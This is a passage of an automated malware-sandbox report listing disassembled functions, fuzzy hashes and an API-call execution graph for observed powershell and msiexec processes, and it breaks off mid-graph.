                                                                Function 06EF0650 Relevance: .1, Instructions: 52COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2608511495.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1b572fde811b4b172b924e4784bed8a48dd079489fa5e359000ddf44c3c18792
                                                                • Instruction ID: 549fb7548e5f8cf6ca6885370a8ab05b34a1f45048179ac7222a5059ba851391
                                                                • Opcode Fuzzy Hash: 1b572fde811b4b172b924e4784bed8a48dd079489fa5e359000ddf44c3c18792
                                                                • Instruction Fuzzy Hash: DB0147367303158BD7909A6A9820A76F79ADFD1226F15C43BF785C6A42DA32C981C7A0
                                                                Function 0278EC13 Relevance: .0, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2582668334.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_2780000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bc4d4530800d6d3d7c8a61e1e7484ce76dc195e0279f1dcf2857261011cb8403
                                                                • Instruction ID: 2cc91ac051710dcef24e5deebb85919e2616fad5e160fb31c0b314180c744cd6
                                                                • Opcode Fuzzy Hash: bc4d4530800d6d3d7c8a61e1e7484ce76dc195e0279f1dcf2857261011cb8403
                                                                • Instruction Fuzzy Hash: 0011F530C82598CFDF26FAA8D9987ECB772AF4031AF142429E501B6190EB7458C9CF15
                                                                Function 0278FEBF Relevance: .0, Instructions: 34COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2582668334.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_2780000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0cbf0697a7fe9d3c36611ae63471fa4287a1ca60526399f4e98bd9a64bb3e2d4
                                                                • Instruction ID: 03a00ec213e6523baf3ab8118878ebe0715ed3515cfa15d785f36a01ce0717be
                                                                • Opcode Fuzzy Hash: 0cbf0697a7fe9d3c36611ae63471fa4287a1ca60526399f4e98bd9a64bb3e2d4
                                                                • Instruction Fuzzy Hash: B7014F31A00209DFCB14DF98D8809ADF7B2FF89324B208268D519A7A55C732AC91CB90

                                                                Non-executed Functions

                                                                Function 06EF6DC8 Relevance: 10.3, Strings: 8, Instructions: 305COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2608511495.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (fMl$(fMl$(fMl$(fMl$(fMl$(fMl$(fMl$(fMl
                                                                • API String ID: 0-3585264056
                                                                • Opcode ID: 6dde22e6508ff072705dc0f8b39ed30bfcd02ada0d1d31a596fd451952a6d167
                                                                • Instruction ID: bbb2675a14d329bc9d4d31bd2ab61f81cf064c80bbf3251d216b2c702babf114
                                                                • Opcode Fuzzy Hash: 6dde22e6508ff072705dc0f8b39ed30bfcd02ada0d1d31a596fd451952a6d167
                                                                • Instruction Fuzzy Hash: 15C19F31F10304CBEB60DF54C861E6AB7B2AF89718F24952DDA06AB344DB72EC45CB91
                                                                Function 06EFE020 Relevance: 8.9, Strings: 7, Instructions: 191COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2608511495.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (fMl$(fMl$(fMl$(fMl$4Jl$4Jl$tL?k
                                                                • API String ID: 0-2571295508
                                                                • Opcode ID: 842dd4540365a6c4c696c9f18281a4abbc1b5f6b158fb1131e1f2d4996b0fbf2
                                                                • Instruction ID: b1db5d62cf233b81bb327002de3b372ed22a0fe990725877b9739ea5b46be5cf
                                                                • Opcode Fuzzy Hash: 842dd4540365a6c4c696c9f18281a4abbc1b5f6b158fb1131e1f2d4996b0fbf2
                                                                • Instruction Fuzzy Hash: DD619E34B10304AFE754DB68C451EAABBF2AF89314F149469D605AB364DB72FC42CB92
                                                                Function 06EFDA48 Relevance: 5.3, Strings: 4, Instructions: 299COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2608511495.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (fMl$(fMl$x.>k$->k
                                                                • API String ID: 0-2368651522
                                                                • Opcode ID: be4461b7f0e55c92f62ba97c33e53738bf74a58e64500c7488baf996abf04763
                                                                • Instruction ID: 85afb53a5bab23d43060aee729cf36d31f6df3288c9684323265254a9afe3d7b
                                                                • Opcode Fuzzy Hash: be4461b7f0e55c92f62ba97c33e53738bf74a58e64500c7488baf996abf04763
                                                                • Instruction Fuzzy Hash: 1AC19A30E10304DFEB24DF54C851FAEBBB2AF88308F119919EA152F744DB76A842CB91
                                                                Function 06EF6DAB Relevance: 5.3, Strings: 4, Instructions: 266COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2608511495.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (fMl$(fMl$(fMl$(fMl
                                                                • API String ID: 0-1143902458
                                                                • Opcode ID: 54f46c55fa5e635d37b38c2be393fe6609b46166f65acff8008b0280461ab7f2
                                                                • Instruction ID: 952d56751c6efeec301a9449f5bcaf05a386128fc9a2acb42981a8b904ce56b3
                                                                • Opcode Fuzzy Hash: 54f46c55fa5e635d37b38c2be393fe6609b46166f65acff8008b0280461ab7f2
                                                                • Instruction Fuzzy Hash: 74A18B31E20300DFEBA0DF54C851EAAB7B2AF88718F24992DDA156B345D772E845CB90
                                                                Function 06EFDFC2 Relevance: 5.2, Strings: 4, Instructions: 203COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2608511495.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (fMl$(fMl$4Jl$tL?k
                                                                • API String ID: 0-3379376695
                                                                • Opcode ID: bd2bc56e4551a8058d39543a0204b2e05d12865bbeec5ff8c2f5c84b7afa79a9
                                                                • Instruction ID: f4c90a11c2186cf2ddd59347a27df61f051f949005aa2e1417d4cf16f59702ee
                                                                • Opcode Fuzzy Hash: bd2bc56e4551a8058d39543a0204b2e05d12865bbeec5ff8c2f5c84b7afa79a9
                                                                • Instruction Fuzzy Hash: F561BE34B10301EFE754CF64C851EAABBB2AF85314F15946AE514AB361DB72FC42CB91
                                                                Function 06EF7200 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2608511495.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (fMl$(fMl$(fMl$(fMl
                                                                • API String ID: 0-1143902458
                                                                • Opcode ID: 657ce33b98585d51498c4d18c919ddc1b0845a4eed011504de4bee3d8bc421d8
                                                                • Instruction ID: e2a027d0139923c9c8cfff19aaf03d494701345120fe6221cea6f36b376b5f65
                                                                • Opcode Fuzzy Hash: 657ce33b98585d51498c4d18c919ddc1b0845a4eed011504de4bee3d8bc421d8
                                                                • Instruction Fuzzy Hash: 41718C70F10204DFEB54DF58D855EAEBBB2AF89314F159169EA05AB350CB32EC42CB91

                                                                Non-executed Functions

                                                                Function 00CBC073 Relevance: 8.0, Strings: 5, Instructions: 1785COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000003.2717481925.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, Offset: 00CB7000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_3_cb7000_msiexec.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0 @$p&@$q$x!@$%@
                                                                • API String ID: 0-3661044626
                                                                • Opcode ID: 4267e95cef9670ac61248a0dfcc296b8c6e7851a6d18970dc35d483d78ef2582
                                                                • Instruction ID: f65c000caeadb51f2e682547f3e8e7d5e9d35188980d95f0b0e5f53ad1514e64
                                                                • Opcode Fuzzy Hash: 4267e95cef9670ac61248a0dfcc296b8c6e7851a6d18970dc35d483d78ef2582
                                                                • Instruction Fuzzy Hash: 56E2DE71508341DFD720DF64C984BEAB7E5FB88314F10492EF5AAA72A0EB708E45CB56
                                                                Function 00CBF6F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 154COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00CBF7DE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000003.2717481925.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, Offset: 00CB7000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_3_cb7000_msiexec.jbxd
                                                                Similarity
                                                                • API ID: CurrentImageNonwritable
                                                                • String ID: csm$csm
                                                                • API String ID: 3104724169-3733052814
                                                                • Opcode ID: 5676ca9d3d157a10ce3569c92175484d4aadc39067b91ee8d714da97257d8839
                                                                • Instruction ID: fcf52b1b87d45ce0c75a1ce64744da39f4cc2322c251109e198075379fb9b056
                                                                • Opcode Fuzzy Hash: 5676ca9d3d157a10ce3569c92175484d4aadc39067b91ee8d714da97257d8839
                                                                • Instruction Fuzzy Hash: 27514F35900209ABCF14DF69CC849DE7BB6AF45325F1481B9EC24AB3A1DB31DE52CB91

                                                                Execution Graph

                                                                Execution Coverage:8.7%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:34.5%
                                                                Total number of Nodes:994
                                                                Total number of Limit Nodes:21
                                                                execution_graph 3378 38a13e 3379 38a0c9 3378->3379 3379->3378 3380 38915b 9 API calls 3379->3380 3380->3379 3381 38a0bf 3382 38a0c9 3381->3382 3383 38915b 9 API calls 3382->3383 3383->3382 3384 3894bf _XcptFilter 3538 388bb0 3541 388a55 3538->3541 3542 388a87 3541->3542 3543 388a73 3541->3543 3545 388ab9 3542->3545 3546 388a9c LoadLibraryW 3542->3546 3544 388a75 Sleep 3543->3544 3544->3542 3544->3544 3547 388acd 3545->3547 3548 388abf GetProcAddress 3545->3548 3546->3545 3548->3547 2821 389330 2838 389e35 2821->2838 2823 389335 2824 389346 GetStartupInfoW 2823->2824 2825 389363 2824->2825 2826 389378 2825->2826 2827 38937f Sleep 2825->2827 2828 389397 _amsg_exit 2826->2828 2830 3893a1 2826->2830 2827->2825 2828->2830 2829 3893e3 _initterm 2832 3893fe __IsNonwritableInCurrentImage 2829->2832 2830->2829 2830->2832 2836 3893c4 2830->2836 2831 3894a6 _ismbblead 2831->2832 2832->2831 2834 3894ee 2832->2834 2835 38948e exit 2832->2835 2843 387d41 2832->2843 2834->2836 2837 3894f7 _cexit 2834->2837 2835->2832 2837->2836 2839 389e5a 2838->2839 2840 389e5e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2838->2840 2839->2840 2841 389ec2 2839->2841 2842 389ead 2840->2842 2841->2823 2842->2841 2844 387d4d 2843->2844 2853 387d1b SetProcessMitigationPolicy 2844->2853 2846 387d64 2854 388adc 2846->2854 2853->2846 2855 388aee 2854->2855 2856 388af8 2855->2856 2857 388ae6 Sleep 2855->2857 2858 388b1f 2856->2858 2859 388b28 GetProcAddress 2856->2859 2860 388b0b LoadLibraryW 2856->2860 2857->2855 2858->2859 2861 387d7c 2858->2861 2859->2861 2860->2858 2860->2859 2862 3863e3 2861->2862 3063 38a1f0 2862->3063 2865 386440 GetCurrentProcess NtQueryInformationProcess 2866 386474 GetCommandLineW 2865->2866 2867 386467 2865->2867 2871 3864b6 GetStdHandle 2866->2871 2867->2866 2869 38650f 2872 386515 memset memset 2869->2872 2870 386503 GetFileType 2870->2869 2870->2872 2871->2869 2871->2870 2873 386558 2872->2873 2874 3866be 2873->2874 2877 3865a0 2873->2877 2875 3866d6 2874->2875 2909 3866ed 2874->2909 2876 388665 2 API calls 2875->2876 2892 3866e9 2876->2892 2879 386f7f 2877->2879 3112 382f5e 2877->3112 2880 3843a0 26 API calls 2879->2880 2880->2909 2883 3865f4 2885 3865ff RegQueryValueExW 2883->2885 2883->2909 2887 38667a RegCloseKey 2885->2887 2888 38662d 2885->2888 2887->2909 2945 38668c 2887->2945 3115 388665 2888->3115 2890 387d17 3060 388f5a 2890->3060 2897 3868b7 CompareStringW 2892->2897 2898 3868e3 CompareStringW 2892->2898 2908 38691b 2892->2908 2892->2909 2894 386654 RegQueryValueExW 2894->2887 2895 386645 RegCloseKey 2895->2909 2896 386f92 2899 386e57 2896->2899 2907 386fa3 2896->2907 2897->2892 2897->2908 2898->2892 2898->2908 3065 3863a0 GetVersion 2899->3065 2900 386b1e memset 3124 38612f 2900->3124 2904 3869ae CompareStringW 2904->2908 2905 386e50 2913 3843a0 26 API calls 2905->2913 2906 386f38 2912 3843a0 26 API calls 2906->2912 2910 3863a0 3 API calls 2907->2910 2939 386fc0 2907->2939 2908->2904 2908->2909 2917 386a57 2908->2917 2919 386a7c 2908->2919 3120 3842fe 2908->3120 3101 3886b2 2909->3101 2910->2939 2916 386f3f 2912->2916 2913->2899 2916->2899 2921 386f65 GlobalFree 2916->2921 2917->2909 2917->2945 2918 3870d7 CoInitialize 3166 38908c memset 2918->3166 2919->2909 2921->2899 2922 386ba3 GlobalFree 2922->2945 2923 387127 2926 387141 GetPEB 2923->2926 2928 387ca3 GetMessageW 2923->2928 2924 386c64 lstrlenW 3135 38878a 2924->3135 2925 386e7e 2925->2909 2925->2918 2934 386ead 2925->2934 2951 387167 2926->2951 2929 387cc8 TranslateMessage DispatchMessageW 2928->2929 2930 387cb8 2928->2930 2929->2928 2930->2929 2933 387c4a 2930->2933 2931 3870fc CoRegisterClassObject 2931->2923 2931->2934 2932 387094 3140 385c84 memset 2932->3140 2936 387c6a CoUninitialize 2933->2936 2940 387c63 CoRevokeClassObject 2933->2940 2934->2923 2934->2926 2934->2931 2936->2909 2938 387c7a 2936->2938 2941 385c84 20 API calls 2938->2941 2939->2909 2939->2925 2939->2932 2940->2936 2941->2919 2942 3859f2 18 API calls 2942->2909 2943 387212 2944 387217 GetCurrentThread OpenThreadToken 2943->2944 2946 38723a GetLastError 2944->2946 2947 3872eb 2944->2947 2945->2879 2945->2896 2945->2899 2945->2900 2945->2905 2945->2906 2945->2909 2945->2922 2945->2924 3132 384725 lstrlenW 2945->3132 2946->2947 2948 3871cd 2946->2948 2949 3872f8 RegCloseKey RegEnumKeyW 2947->2949 2950 3872f2 RevertToSelf 2947->2950 2948->2942 2952 38731b GetCurrentProcess OpenProcessToken 2949->2952 2953 387315 RevertToSelf 2949->2953 2950->2949 2951->2943 2951->2944 2951->2948 2954 3872a2 OpenEventW 2951->2954 2955 3873cb GetLastError memset 2952->2955 2956 387346 2952->2956 2953->2952 2958 387c88 GetLastError 2954->2958 2959 3872bc 2954->2959 3184 382e35 2955->3184 3173 3830f2 2956->3173 2958->2948 2959->2958 2961 3872c5 WaitForSingleObject CloseHandle 2959->2961 2961->2944 2963 3872df 2961->2963 2963->2948 2964 38738c CloseHandle 2968 387401 2964->2968 2965 387353 GetTokenInformation 2965->2964 2967 387377 EqualSid 2965->2967 2967->2964 2968->2963 2969 38744b 2968->2969 3188 3831a9 2969->3188 2972 3874b2 2974 3874b9 CloseHandle 2972->2974 2975 3874c3 2972->2975 2973 3874d4 3295 388620 2973->3295 2974->2975 3273 3859f2 GetLastError 2975->3273 2979 388620 2 API calls 2980 38750c 2979->2980 2981 388620 2 API calls 2980->2981 2982 38751c 2981->2982 2983 388620 2 API calls 2982->2983 2984 38752c 2983->2984 2985 388620 2 API calls 2984->2985 2986 38753c MakeAbsoluteSD 2985->2986 2987 3875b8 2986->2987 2988 387593 GetLastError 2986->2988 2992 3875fe CreateEventW 2987->2992 2993 3875e2 2987->2993 2989 3875ac 2988->2989 2990 3875a2 CloseHandle 2988->2990 2991 3859f2 18 API calls 2989->2991 2990->2989 3022 387665 2991->3022 2996 387628 CreateEventW 2992->2996 2997 387611 2992->2997 2993->2989 2995 3875e8 CloseHandle 2993->2995 2994 387af3 2999 387b13 2994->2999 3006 387b06 GlobalFree 2994->3006 2995->2989 3002 38766a 2996->3002 3003 38763a 2996->3003 3000 387621 GetLastError 2997->3000 3001 387617 CloseHandle 2997->3001 2998 387ae6 GlobalFree 2998->2994 3007 387b33 2999->3007 3010 387b26 GlobalFree 2999->3010 3000->2989 3001->3000 3299 3862a8 3002->3299 3003->3000 3004 387640 CloseHandle 3003->3004 3004->3000 3006->2999 3011 387b53 3007->3011 3014 387b46 GlobalFree 3007->3014 3010->3007 3011->2909 3015 387b6e GlobalFree 3011->3015 3012 38768a 3016 387691 CloseHandle 3012->3016 3032 38769b 3012->3032 3013 3876a5 3308 383dfa 3013->3308 3014->3011 3015->2909 3016->3032 3019 3876bc 3020 3876c3 CloseHandle 3019->3020 3019->3032 3020->3032 3021 3859f2 18 API calls 3021->3022 3022->2994 3022->2998 3023 3876d7 3024 387792 OpenProcess 3023->3024 3025 387773 3023->3025 3027 3877aa 3024->3027 3028 3877cf 3024->3028 3026 38777a CloseHandle 3025->3026 3025->3032 3026->3032 3029 3877bb GetLastError 3027->3029 3030 3877b1 CloseHandle 3027->3030 3031 3877e7 3028->3031 3034 387802 3028->3034 3029->3032 3030->3029 3031->3032 3033 3877ee CloseHandle 3031->3033 3032->3021 3033->3032 3035 3878d9 3034->3035 3036 3878ca CloseHandle 3034->3036 3035->3032 3043 38793f 3035->3043 3036->3035 3037 387a79 MsgWaitForMultipleObjects 3038 387a99 CloseHandle 3037->3038 3037->3043 3046 387bca 3038->3046 3047 387bb3 3038->3047 3039 387b80 CloseHandle 3039->3038 3040 3879d2 CloseHandle 3040->3043 3041 387a56 PeekMessageW 3041->3043 3043->3037 3043->3038 3043->3039 3043->3040 3043->3041 3044 3879ff OpenProcess 3043->3044 3045 387a3a TranslateMessage DispatchMessageW 3043->3045 3044->3043 3048 387aa6 3044->3048 3045->3041 3050 387bea 3046->3050 3051 387bdd GlobalFree 3046->3051 3047->3046 3049 387bbd GlobalFree 3047->3049 3053 387aad CloseHandle 3048->3053 3054 387ab7 GetLastError 3048->3054 3049->3046 3052 387c0a 3050->3052 3055 387bfd GlobalFree 3050->3055 3051->3050 3056 387c2a 3052->3056 3058 387c1d GlobalFree 3052->3058 3053->3054 3057 3859f2 18 API calls 3054->3057 3055->3052 3056->2933 3059 387c3d GlobalFree 3056->3059 3057->3022 3058->3056 3059->2933 3372 388eca 3060->3372 3064 3863f5 GetVersionExW 3063->3064 3064->2865 3064->2866 3066 3863aa 3065->3066 3067 3863e2 3065->3067 3066->3067 3068 3863ae GetModuleHandleW 3066->3068 3067->2925 3071 3843a0 3067->3071 3068->3067 3069 3863bd GetProcAddress 3068->3069 3070 3863d0 3069->3070 3070->3067 3072 3843af 3071->3072 3073 38878a 2 API calls 3072->3073 3074 3843e8 3073->3074 3075 3845aa 3074->3075 3077 38878a 2 API calls 3074->3077 3076 3887d4 GlobalFree 3075->3076 3078 3845b5 3076->3078 3079 3843fd 3077->3079 3080 3887d4 GlobalFree 3078->3080 3079->3075 3082 38878a 2 API calls 3079->3082 3081 3845c0 3080->3081 3081->2925 3083 384442 3082->3083 3084 38444a GetModuleFileNameW 3083->3084 3085 384596 3083->3085 3084->3085 3086 384465 3084->3086 3087 3887d4 GlobalFree 3085->3087 3312 388c90 3086->3312 3087->3075 3089 3844dd GlobalAlloc 3090 3844f6 3089->3090 3091 38451b 3090->3091 3092 38450e GlobalFree 3090->3092 3098 384588 3090->3098 3317 388cd0 3091->3317 3092->3091 3093 384590 GlobalFree 3093->3085 3094 382e35 _vsnwprintf 3095 3845f9 3094->3095 3097 382e35 _vsnwprintf 3095->3097 3095->3098 3097->3098 3098->3085 3098->3093 3102 387cf8 3101->3102 3103 3886c2 GlobalFree 3101->3103 3104 3887d4 3102->3104 3103->3102 3105 3887df GlobalFree 3104->3105 3106 387d04 3104->3106 3105->3106 3107 3895e0 3106->3107 3108 3895e8 3107->3108 3109 3895eb 3107->3109 3108->2890 3332 3895f0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 3109->3332 3111 389726 3111->2890 3113 382f7f RegOpenKeyExW 3112->3113 3114 382f71 3112->3114 3113->2883 3114->3113 3116 38867a GlobalAlloc 3115->3116 3118 38868a 3115->3118 3116->3118 3117 386641 3117->2894 3117->2895 3118->3117 3119 38869c GlobalFree 3118->3119 3119->3117 3121 38431c 3120->3121 3123 384349 3121->3123 3333 3887f5 3121->3333 3123->2908 3125 38614e IsCharAlphaNumericW 3124->3125 3126 38615d 3124->3126 3125->3126 3131 38626e 3125->3131 3127 386262 3126->3127 3128 386275 3126->3128 3126->3131 3129 3859f2 18 API calls 3127->3129 3128->3131 3338 388865 3128->3338 3129->3131 3131->2945 3344 3886d5 3132->3344 3134 38474b 3134->2945 3136 38879c GlobalAlloc 3135->3136 3138 3887ac 3135->3138 3136->3138 3137 3887b3 3137->2945 3138->3137 3139 3887be GlobalFree 3138->3139 3139->3137 3141 385ce3 GetACP LoadLibraryW 3140->3141 3142 385cc3 3140->3142 3143 385d4c FormatMessageW 3141->3143 3144 385cfc GetProcAddress 3141->3144 3142->3141 3155 385d88 3142->3155 3147 385d94 3143->3147 3148 385d76 3143->3148 3145 385d12 GetLocaleInfoW 3144->3145 3146 385d45 FreeLibrary 3144->3146 3145->3146 3162 385d42 3145->3162 3146->3143 3150 382e35 _vsnwprintf 3147->3150 3149 385ee4 3148->3149 3148->3155 3349 389728 3149->3349 3150->3155 3152 385e86 3154 385e84 3152->3154 3159 385e8f lstrlenW WriteFile WriteFile 3152->3159 3161 3895e0 4 API calls 3154->3161 3155->3152 3155->3154 3156 385dd5 memset GetVersionExW 3155->3156 3157 385e28 3156->3157 3158 385e11 3156->3158 3165 3887d4 GlobalFree 3157->3165 3158->3157 3164 38878a 2 API calls 3158->3164 3159->3154 3163 385ee2 3161->3163 3162->3146 3163->2925 3164->3157 3165->3154 3353 389002 3166->3353 3169 3890db 3171 3895e0 4 API calls 3169->3171 3170 3890cc LoadLibraryW 3170->3169 3172 3890e7 3171->3172 3172->2934 3174 383120 AllocateAndInitializeSid 3173->3174 3175 383164 3173->3175 3176 38313d GetLastError 3174->3176 3177 383145 GetLengthSid 3174->3177 3178 3895e0 4 API calls 3175->3178 3176->3175 3179 38316b GetLengthSid memcpy 3177->3179 3180 383155 3177->3180 3181 3831a7 3178->3181 3179->3175 3183 38318e FreeSid 3179->3183 3180->3175 3182 38315b FreeSid 3180->3182 3181->2964 3181->2965 3182->3175 3183->3175 3185 382e44 3184->3185 3186 382e74 3185->3186 3187 382e54 _vsnwprintf 3185->3187 3186->2968 3187->3186 3189 3831de 3188->3189 3189->3189 3190 383694 3189->3190 3193 383618 3189->3193 3194 383222 3189->3194 3191 3836b4 AllocateAndInitializeSid 3190->3191 3192 3836a7 FreeSid 3190->3192 3195 3836da 3191->3195 3196 383920 GetLastError 3191->3196 3192->3191 3197 38362e AllocateAndInitializeSid 3193->3197 3198 383621 FreeSid 3193->3198 3199 383538 3194->3199 3200 38322b 3194->3200 3201 3836f0 AllocateAndInitializeSid 3195->3201 3202 3836e3 FreeSid 3195->3202 3203 383928 3196->3203 3197->3196 3204 383654 3197->3204 3198->3197 3207 38354e AllocateAndInitializeSid 3199->3207 3208 383541 FreeSid 3199->3208 3205 383492 3200->3205 3206 383234 3200->3206 3201->3196 3210 383715 3201->3210 3202->3201 3222 38393b FreeSid 3203->3222 3228 383947 3203->3228 3213 38366a AllocateAndInitializeSid 3204->3213 3214 38365d FreeSid 3204->3214 3211 3834a8 AllocateAndInitializeSid 3205->3211 3212 38349b FreeSid 3205->3212 3215 38323d 3206->3215 3216 3833bf 3206->3216 3207->3196 3209 383574 3207->3209 3208->3207 3217 38358a AllocateAndInitializeSid 3209->3217 3218 38357d FreeSid 3209->3218 3219 38372b AllocateAndInitializeSid 3210->3219 3220 38371e FreeSid 3210->3220 3211->3196 3221 3834ce 3211->3221 3212->3211 3213->3190 3213->3196 3214->3213 3230 38325c AllocateAndInitializeSid 3215->3230 3231 38324f FreeSid 3215->3231 3248 383376 3215->3248 3223 3833c8 FreeSid 3216->3223 3224 3833d5 AllocateAndInitializeSid 3216->3224 3217->3196 3225 3835b4 3217->3225 3218->3217 3219->3196 3219->3248 3220->3219 3226 3834e4 AllocateAndInitializeSid 3221->3226 3227 3834d7 FreeSid 3221->3227 3222->3203 3223->3224 3224->3196 3232 3833fa 3224->3232 3237 3835ca AllocateAndInitializeSid 3225->3237 3238 3835bd FreeSid 3225->3238 3226->3196 3226->3248 3227->3226 3239 3895e0 4 API calls 3228->3239 3229 3837ba memset 3235 38380f InitializeAcl 3229->3235 3236 3837e6 GlobalAlloc 3229->3236 3230->3196 3241 383282 3230->3241 3231->3230 3233 383410 AllocateAndInitializeSid 3232->3233 3234 383403 FreeSid 3232->3234 3233->3196 3244 383436 3233->3244 3234->3233 3246 3838fd GetLastError 3235->3246 3247 383824 3235->3247 3245 38380b 3236->3245 3258 383804 3236->3258 3237->3196 3237->3248 3238->3237 3249 38395a 3239->3249 3240 383799 GetLengthSid 3240->3240 3250 3837b0 3240->3250 3242 383298 AllocateAndInitializeSid 3241->3242 3243 38328b FreeSid 3241->3243 3242->3196 3251 3832be 3242->3251 3243->3242 3252 38344c AllocateAndInitializeSid 3244->3252 3253 38343f FreeSid 3244->3253 3245->3235 3246->3258 3254 38382e AddAccessAllowedAce 3247->3254 3255 383880 InitializeSecurityDescriptor 3247->3255 3248->3229 3248->3240 3249->2972 3249->2973 3250->3229 3256 3832d4 AllocateAndInitializeSid 3251->3256 3257 3832c7 FreeSid 3251->3257 3252->3196 3252->3248 3253->3252 3254->3246 3259 383850 GetAce 3254->3259 3255->3246 3260 383891 SetSecurityDescriptorDacl 3255->3260 3256->3196 3261 3832fe 3256->3261 3257->3256 3258->3203 3262 383917 GlobalFree 3258->3262 3259->3246 3259->3247 3260->3246 3263 3838a7 SetSecurityDescriptorOwner 3260->3263 3264 383314 AllocateAndInitializeSid 3261->3264 3265 383307 FreeSid 3261->3265 3262->3203 3263->3246 3266 3838b8 3263->3266 3264->3196 3267 38333a 3264->3267 3265->3264 3268 3838c0 SetSecurityDescriptorGroup 3266->3268 3269 3838d1 GetSecurityDescriptorLength 3266->3269 3270 383350 AllocateAndInitializeSid 3267->3270 3271 383343 FreeSid 3267->3271 3268->3246 3268->3269 3269->3258 3272 3838e9 MakeSelfRelativeSD 3269->3272 3270->3196 3270->3248 3271->3270 3272->3246 3272->3258 3274 385a29 3273->3274 3285 385ac5 3273->3285 3275 382f5e RegOpenKeyExW 3274->3275 3279 385a48 3275->3279 3276 385b6b 3277 385bda SetLastError 3276->3277 3278 385b77 memset 3276->3278 3283 3895e0 4 API calls 3277->3283 3280 385b9b 3278->3280 3281 385bb6 3278->3281 3282 385a4f RegQueryValueExW 3279->3282 3279->3285 3287 382e35 _vsnwprintf 3280->3287 3288 382e35 _vsnwprintf 3281->3288 3289 385aa4 RegCloseKey 3282->3289 3290 385a94 3282->3290 3291 385bee 3283->3291 3284 385afd RegCreateKeyExW 3284->3276 3286 385b1e RegSetValueExW lstrlenW RegSetValueExW RegCloseKey 3284->3286 3285->3276 3285->3284 3286->3276 3292 385bb1 3287->3292 3288->3292 3289->3285 3293 385ab9 GlobalFree 3289->3293 3290->3289 3291->2919 3292->3277 3294 385bcd OutputDebugStringW 3292->3294 3293->3285 3294->3277 3296 38864b memset 3295->3296 3297 388637 GlobalAlloc 3295->3297 3298 3874fc 3296->3298 3297->3298 3298->2979 3300 3862e3 3299->3300 3301 3862eb memset 3300->3301 3304 386326 3300->3304 3302 382e35 _vsnwprintf 3301->3302 3303 386312 3302->3303 3303->3304 3305 3859f2 18 API calls 3303->3305 3306 3895e0 4 API calls 3304->3306 3305->3304 3307 386378 3306->3307 3307->3012 3307->3013 3309 383e28 GetProcAddress 3308->3309 3310 383e14 LoadLibraryW 3308->3310 3311 